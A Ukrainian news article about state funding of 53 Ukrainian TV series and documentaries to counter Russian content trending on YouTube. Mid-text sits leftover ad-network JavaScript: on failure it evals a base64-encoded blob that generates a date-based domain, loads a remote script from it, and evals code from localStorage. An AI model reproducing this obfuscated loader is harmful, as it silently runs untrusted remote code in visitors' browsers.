Державне підприємство «Мультимедійна платформа іномовлення України» профінансує 53 проєкти, як-от художні телесеріали та документальні проєкти, від 32 вітчизняних продакшенів. Станом на 19 липня укладено 17 договорів на загальну суму понад 150 млн грн. Загалом на них виділили 400 мільйонів гривень.
Про це повідомляє «Детектор медіа», передає «Акцент».
За результатами мистецького конкурсу, організатором якого у травні–червні стало ДП «МПІУ», держава профінансує понад 240 годин українськомовного контенту, який вийде в ефірах різних телеканалів. Частина прем’єр очікується вже цього року, більшість — наступного.
У МПІУ зауважили, що виробництво актуального українського аудіовізуального контенту різних жанрів під час повномасштабної війни — це «питання національної інформаційної та культурної безпеки, надважливе для розвитку креативної незалежності та протидії ворожій пропаганді, а також питання підтримки ментального здоров’я нації».
«Державне фінансування кіносеріального виробництва — це, у першу чергу, відповідь на зростаючий запит українських глядачів на контент сучасної тематики різних жанрів. Свідченням такого запиту є показники дивлення українських медіа, що транслюють неновинний контент, зокрема фільми та серіали, і показники переглядів такого контенту на YouTube-майданчиках», — ідеться в повідомленні. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Пресслужба підприємства зазначила, що наразі в українському сегменті ютубу спостерігається тенденція до зростання переглядів пропагандистських російських серіалів, переважно комедій та мелодрам.
«Такий контент, на відміну від відвертої пропаганди, українці досі активно дивляться і, маємо це усвідомлювати, дивитимуться надалі, якщо ми не запропонуємо їм вітчизняну альтернативу з українськими наративами та бекграундом.
Для розуміння, станом на сьогодні, в першій двадцятці трендів українського сегменту YouTube бачимо комедію «Інтерни» з ненависником України Іваном Охлобистіним у головній ролі, комедію «Гусар» від російського Comedy Club з Гаріком «Бульдогом» Харламовим, кілька класичних мелодрам про складну жіночу долю простих, добрих і милих російських красунь, кілька розважальних програм», — розповіли в МПІУ. (adsbygoogle = window.adsbygoogle || []).push({});
Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/z-byudzhetu-ukrayini-vitratyat-400-miljoniv-na-seriali/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook